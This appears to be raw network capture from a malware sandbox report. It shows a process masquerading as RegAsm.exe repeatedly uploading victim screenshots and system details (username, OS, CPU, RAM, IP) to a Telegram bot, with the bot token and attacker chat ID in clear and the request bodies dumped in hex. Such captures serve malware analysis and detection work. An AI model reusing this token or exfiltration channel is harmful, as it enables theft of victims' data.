                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":258,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488732,"document":{"file_name":"user-715575 2024-06-11 04-38-12.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgECZk-KHIzVkwrnVsACn4poxQvRUg8AArgTAALx64FS7VKi3NjcxNMBAAdtAAM1BA","file_unique_id":"AQADuBMAAvHrgVJy","file_size":12370,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgECZk-KHIzVkwrnVsACn4poxQvRUg8AArgTAALx64FS7VKi3NjcxNMBAAdtAAM1BA","file_unique_id":"AQADuBMAAvHrgVJy","file_size":12370,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBAmZPihyM1ZMK51bAAp-KaMUL0VIPAAK4EwAC8euBUu1SotzY3MTTNQQ","file_unique_id":"AgADuBMAAvHrgVI","file_size":66304},"caption":"New SC Recovered!\n\nTime: 06/11/2024 04:28:06\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.749721149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:25:32 UTC262OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dc8bd66cafcc93
                                              Host: api.telegram.org
                                              Content-Length: 66933
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2024-05-23 18:25:32 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:25:32 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 62 64 36 36 63 61 66 63 63 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 62 64 36 36 63 61 66 63 63 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 31 33 2f 32 30 32 34 20 31 38 3a 32 37 3a 30 33 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dc8bd66cafcc93Content-Disposition: form-data; name="chat_id"7153133538-----------------------------8dc8bd66cafcc93Content-Disposition: form-data; name="caption"New SC Recovered!Time: 06/13/2024 18:27:03User
                                              2024-05-23 18:25:32 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:25:32 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:25:32 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:25:32 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:25:32 UTC1347OUTData Raw: af 73 e2 7d 72 e2 ea 59 ff 00 b5 6f 22 f3 1c bf 97 15 c3 aa 2e 4e 70 a3 3c 01 da b2 28 a4 06 9c ba e5 f4 f3 c3 3d c4 9e 7c d1 5b 49 6d e6 4a 59 99 95 c3 82 49 27 92 04 87 1f 41 59 94 51 40 05 14 51 40 05 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 ae 46 8a 49 2e 75 3e ab 60 7a c5 c7 a3 3b 29 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a cf d6 7c 4a ba 8e 90 ba 72 5b 32 aa b8 71 23 37 27 19 ed 8f 7f 5a e7 68 ac e3 46 11 8a 82 5a 27 7e bb 94 e6 dc b9 ba da c1 45 14 56 a4 85 6f 69 5a b2 08 96 09 db 63 2f 0a de a2 b0 68 a9 94 54 95 99 13 82 9a b3 3d 33 4d d4 ee ee 5b 6b de 6d 81 06 5e 43 b4 1c 7a 6e eb fa d6 57 8a bc 4f 04 96 af 61 61 20 90 c8 31 24 8b d0 0f 41 eb 5c 45 15 c8 f0 6a 75 55 4a 8e f6 d9 1b 52 9b a5 4d c1 75 ea 14 51 45 77 10
                                              Data Ascii: s}rYo".Np<(=|[ImJYI'AYQ@Q@ux+Im?-pl,tFI.u>`z;)myM c`:|Jr[2q#7'ZhFZ'~EVoiZc/hT=3M[km^CznWOaa 1$A\EjuUJRMuQEw
                                              2024-05-23 18:25:32 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 38 62 64 36 36 63 61 66 63 63 39 33 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dc8bd66cafcc93--
                                              2024-05-23 18:25:33 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:25:33 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":259,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488733,"document":{"file_name":"user-715575 2024-06-13 18-27-04.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEDZk-KHRv0N3WhTBQLivnDJ15cR7sAArkTAALx64FSKvv_57vkoo4BAAdtAAM1BA","file_unique_id":"AQADuRMAAvHrgVJy","file_size":12370,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEDZk-KHRv0N3WhTBQLivnDJ15cR7sAArkTAALx64FSKvv_57vkoo4BAAdtAAM1BA","file_unique_id":"AQADuRMAAvHrgVJy","file_size":12370,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBA2ZPih0b9Dd1oUwUC4r5wydeXEe7AAK5EwAC8euBUir7_-e75KKONQQ","file_unique_id":"AgADuRMAAvHrgVI","file_size":66304},"caption":"New SC Recovered!\n\nTime: 06/13/2024 18:27:03\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.749722149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:25:46 UTC238OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dc91e70aa5adef
                                              Host: api.telegram.org
                                              Content-Length: 66933
                                              Expect: 100-continue
                                              2024-05-23 18:25:46 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 31 65 37 30 61 61 35 61 64 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 31 65 37 30 61 61 35 61 64 65 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 32 31 2f 32 30 32 34 20 31 31 3a 33 31 3a 30 37 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dc91e70aa5adefContent-Disposition: form-data; name="chat_id"7153133538-----------------------------8dc91e70aa5adefContent-Disposition: form-data; name="caption"New SC Recovered!Time: 06/21/2024 11:31:07User
                                              2024-05-23 18:25:46 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:25:46 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:25:46 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:25:46 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:25:46 UTC1347OUTData Raw: af 73 e2 7d 72 e2 ea 59 ff 00 b5 6f 22 f3 1c bf 97 15 c3 aa 2e 4e 70 a3 3c 01 da b2 28 a4 06 9c ba e5 f4 f3 c3 3d c4 9e 7c d1 5b 49 6d e6 4a 59 99 95 c3 82 49 27 92 04 87 1f 41 59 94 51 40 05 14 51 40 05 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 ae 46 8a 49 2e 75 3e ab 60 7a c5 c7 a3 3b 29 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a cf d6 7c 4a ba 8e 90 ba 72 5b 32 aa b8 71 23 37 27 19 ed 8f 7f 5a e7 68 ac e3 46 11 8a 82 5a 27 7e bb 94 e6 dc b9 ba da c1 45 14 56 a4 85 6f 69 5a b2 08 96 09 db 63 2f 0a de a2 b0 68 a9 94 54 95 99 13 82 9a b3 3d 33 4d d4 ee ee 5b 6b de 6d 81 06 5e 43 b4 1c 7a 6e eb fa d6 57 8a bc 4f 04 96 af 61 61 20 90 c8 31 24 8b d0 0f 41 eb 5c 45 15 c8 f0 6a 75 55 4a 8e f6 d9 1b 52 9b a5 4d c1 75 ea 14 51 45 77 10
                                              Data Ascii: s}rYo".Np<(=|[ImJYI'AYQ@Q@ux+Im?-pl,tFI.u>`z;)myM c`:|Jr[2q#7'ZhFZ'~EVoiZc/hT=3M[km^CznWOaa 1$A\EjuUJRMuQEw
                                              2024-05-23 18:25:46 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 31 65 37 30 61 61 35 61 64 65 66 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dc91e70aa5adef--
                                              2024-05-23 18:25:46 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:25:46 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:25:46 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":260,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488746,"document":{"file_name":"user-715575 2024-06-21 11-41-08.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEEZk-KKlndCCTGaxsmGnOq5fASke4AAroTAALx64FSi0pipry72ggBAAdtAAM1BA","file_unique_id":"AQADuhMAAvHrgVJy","file_size":12370,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEEZk-KKlndCCTGaxsmGnOq5fASke4AAroTAALx64FSi0pipry72ggBAAdtAAM1BA","file_unique_id":"AQADuhMAAvHrgVJy","file_size":12370,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBBGZPiipZ3QgkxmsbJhpzquXwEpHuAAK6EwAC8euBUotKYqa8u9oINQQ","file_unique_id":"AgADuhMAAvHrgVI","file_size":66304},"caption":"New SC Recovered!\n\nTime: 06/21/2024 11:31:07\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.749723149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:25:46 UTC238OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dc93c33507ca83
                                              Host: api.telegram.org
                                              Content-Length: 66933
                                              Expect: 100-continue
                                              2024-05-23 18:25:46 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 33 63 33 33 35 30 37 63 61 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 33 63 33 33 35 30 37 63 61 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 36 2f 32 33 2f 32 30 32 34 20 31 39 3a 33 38 3a 32 35 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dc93c33507ca83Content-Disposition: form-data; name="chat_id"7153133538-----------------------------8dc93c33507ca83Content-Disposition: form-data; name="caption"New SC Recovered!Time: 06/23/2024 19:38:25User
                                              2024-05-23 18:25:46 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:25:46 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 